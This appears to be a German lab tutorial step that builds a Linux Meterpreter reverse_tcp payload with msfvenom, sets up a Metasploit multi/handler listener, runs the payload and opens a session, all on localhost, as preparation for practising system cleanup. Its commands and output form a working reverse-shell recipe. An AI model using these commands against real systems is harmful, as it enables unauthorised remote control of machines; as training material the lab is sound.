Eine Meterpreter-Session auf einem Ziel erlangen
In diesem Schritt, bevor wir das Bereinigen eines Systems üben können, müssen wir zuerst darauf zugreifen. Wir simulieren dies, indem wir eine Payload mit msfvenom erstellen, einen Listener im Metasploit Framework einrichten und dann die Payload auf unserer eigenen Maschine "ausführen", um eine Meterpreter-Session auf localhost zu erhalten.
Öffnen Sie zuerst ein Terminal und verwenden Sie msfvenom, um eine Linux Meterpreter-Payload zu generieren. Dieser Befehl erstellt eine ausführbare Datei namens payload.elf in Ihrem aktuellen Verzeichnis (~/project).
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
Sie sollten eine Ausgabe sehen, die anzeigt, dass die Payload erfolgreich generiert wurde:
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, choosing x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 120 bytes
Final size of elf file: 240 bytes
Saved as: ~/project/payload.elf
Starten Sie als Nächstes die Metasploit Framework-Konsole. Das Flag -q sorgt dafür, dass sie leise startet, ohne das Banner anzuzeigen.
msfconsole -q
Sobald Sie sich in der msfconsole-Eingabeaufforderung befinden, müssen Sie einen Listener konfigurieren, um die Verbindung von der Payload abzufangen. Wir werden das Modul exploit/multi/handler verwenden.
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
Der Befehl exploit -j startet den Listener als Hintergrundjob, sodass Sie die Konsole weiterhin verwenden können. Sie sehen eine Meldung, dass der Handler gestartet wurde.
Öffnen Sie nun einen neuen Terminal-Tab, indem Sie auf das +-Symbol im Terminalfenster klicken. In diesem neuen Tab machen Sie die Payload ausführbar und führen sie aus.
chmod +x ~/project/payload.elf
~/project/payload.elf
Wechseln Sie zurück zu Ihrem ersten Terminal-Tab mit msfconsole. Sie sollten eine Meldung sehen, die anzeigt, dass eine Meterpreter-Session geöffnet wurde.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36978) at 2023-10-27 10:30:00 -0400
Um mit dieser neuen Session zu interagieren, verwenden Sie den Befehl sessions.
sessions -i 1
Ihre Eingabeaufforderung sollte sich zu meterpreter > ändern, was anzeigt, dass Sie nun die Kontrolle über die Session haben.